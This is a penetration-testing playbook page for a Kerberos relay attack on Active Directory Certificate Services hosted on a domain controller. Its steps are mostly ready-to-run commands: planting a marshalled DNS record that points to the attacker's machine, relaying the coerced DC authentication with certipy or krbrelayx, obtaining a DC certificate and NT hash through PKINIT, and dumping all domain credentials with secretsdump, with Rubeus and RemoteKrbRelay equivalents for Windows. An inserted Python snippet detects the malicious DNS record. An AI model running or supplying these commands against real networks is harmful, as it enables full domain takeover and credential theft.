PRIMARY CATEGORY → KERBEROS RELAY

Theory

This technique is usually carried out when an operator faces an AD environment where ADCS is deployed on a Domain Controller itself and the HTTP Web Enrollment endpoint is enabled

It also applies when NTLM authentication is disabled for the HTTP Web Enrollment endpoint or for the entire domain

Since ESC8 cannot be performed under those conditions, we have to leverage Kerberos relay in order to bypass one of these restrictions

Workflow
Requirements

Abuse - UNIX-Like

Creating a “Marshall” DNS Record

First of all, we have to leverage a controlled domain account to add an arbitrary DNS record to the domain DNS zone, pointing to our attacker machine

The record name must contain the following marshalled structure

Marshalled Structure → 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Setup

git clone https://github.com/CravateRouge/bloodyAD BloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

python3 bloodyAD.py --host '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --domain '<DOMAIN>' --kerberos add dnsRecord '<STRING>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' '<ATTACKER_IP>'

Setup

git clone https://github.com/dirkjanm/krbrelayx KRBRELAYX
cd !$

Usage

python3 dnstool.py --user '<DOMAIN>\<USER>' --password '<PASSWD>' --kerberos -dc-ip '<DC_IP>' --tcp --action add --type A --record '<STRING>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' --data '<ATTACKER_IP>' '<DC_FQDN>'

We may face the following error when running the command above

This occurs because the client's DNS resolvers do not know how to resolve the domain in question

Simply add the following line to the /etc/resolv.conf file, so the client sends queries for that name to the specified resolver and no longer gets an NXDOMAIN error

nameserver <DC_IP>
...<SNIP>...
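A defender-side check for the record described above, added here as an example (it is not from the page or from any of the tools it lists): it parses a constructed zone export and flags A records whose name carries the marshalled target-info marker, and additionally notes when such a record points at a host outside an assumed allowlist of trusted DC/DNS addresses.

```python
"""Flag DNS records whose name embeds the marshalled target-info marker (added example)."""
import ipaddress
import re
from dataclasses import dataclass

# Exact marker as it appears on this page.
MARSHALLED_MARKER = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
# Looser heuristic: same fixed prefix followed by a long base64-like run.
MARSHALLED_RE = re.compile(r"1UWhRC[A-Za-z0-9+/=_-]{20,}")

# Constructed sample of a zone export in "name type data" form (not real data).
SAMPLE_ZONE = """
; constructed sample, one record per line
dc01                                                A   10.0.0.5
fileserver                                          A   10.0.0.20
host1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA     A   10.0.0.99
"""

@dataclass(frozen=True)
class Finding:
    name: str
    data: str
    reasons: tuple

def parse_zone_export(text):
    """Parse 'name type data' lines, skipping blanks and ';' comments."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0].startswith(";"):
            continue
        records.append((parts[0], parts[1].upper(), parts[2]))
    return records

def audit_dns_records(records, trusted_hosts):
    """Return findings for A records whose name carries the marshalled marker.
    trusted_hosts is an assumed allowlist of DC/DNS IPs (placeholder values)."""
    trusted = {ipaddress.ip_address(h) for h in trusted_hosts}
    findings = []
    for name, rtype, data in records:
        if rtype != "A" or not (MARSHALLED_MARKER in name or MARSHALLED_RE.search(name)):
            continue
        reasons = ["marshalled-target-info-in-name"]
        try:
            if ipaddress.ip_address(data) not in trusted:
                reasons.append("points-to-untrusted-host")
        except ValueError:
            reasons.append("unparseable-address")
        findings.append(Finding(name, data, tuple(reasons)))
    return findings
```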

Setting up a Relayer

Then, we have to run a tool that relays the incoming AP-REQ from the victim to the specified target

In this case, we will coerce a DC into authenticating back to us over a protocol whose authentication we can relay to the ADCS Web Enrollment endpoint

Setup

mkdir Certipy
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install certipy-ad

Usage

certipy relay -target 'http://<DC_FQDN>' -template DomainController

Setup

git clone https://github.com/dirkjanm/krbrelayx KRBRELAYX
cd !$

Usage

python3 krbrelayx.py --target 'http://<DC_FQDN>/certsrv/certfnsh.asp' --adcs --template 'DomainController' --victim '<DC_NAME>$'

Listing available Coercion Methods

Setup

pipx install git+https://github.com/Pennyw0rth/NetExec

Usage

nxc smb '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --module coerce_plus

Coercing the victim to authenticate back to us using Kerberos

Usage

nxc smb '<DC_FQDN>' --username '<USER>' --password '<PASSWD>' --module coerce_plus -o LISTENER='<MARSHALL_DNS_RECORD>' METHOD='<SUPPORTED_COERCION_METHOD>'

Passing the Certificate + Unpacking the Hash

AS Exchange via PKINIT Certificate Trust

Automated

PtC + UtH

certipy auth -dc-ip '<DC_IP>' -domain '<DOMAIN>' -pfx '<PFX_CERT>'

Manual

Setup

git clone https://github.com/dirkjanm/PKINITtools PKINITtools
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

Usage

PtC

gettgtpkinit.py

python3 gettgtpkinit.py -dc-ip '<DC_IP>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/<PRINCIPAL>' '<CCACHE_FILE>'

UtH

getnthash.py

export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )
getnthash.py -dc-ip '<DC_IP>' -key '<AS_REP_ENC_KEY>' '<DOMAIN>/<PRINCIPAL>'

Retrieving Credentials from the Entire Domain

Once we have control over the DC computer account, we can leverage the DRSUAPI RPC interface, authenticating as that account, in order to perform a DCSync attack

secretsdump.py -k -no-pass '<DC_FQDN>'

Abuse - Windows

Non-Domain Joined Machine

Requesting a TGT and injecting it into the current Logon Session

Rubeus.exe asktgt /user:<USER> /password:<PASSWD> /dc:<DC_IP> /ptt /nowrap

Requesting an RPCSS Service Ticket and injecting it into the current Logon Session

Rubeus.exe asktgs /service:RPCSS/<DC_FQDN> /dc:<DC_IP> /ptt /ticket:<TGT>

Coercion + Relay

RemoteKrbRelay.exe -adcs -template 'DomainController' -victim '<DC_FQDN>' -target '<DC_FQDN>' -clsid '<CLSID>'

Then save the resulting base64-encoded certificate and continue from the "Passing the Certificate + Unpacking the Hash" step above on your Linux VM


Resources

Relaying Kerberos over SMB using KRBRelayx.py

XCT: Vuln Cicada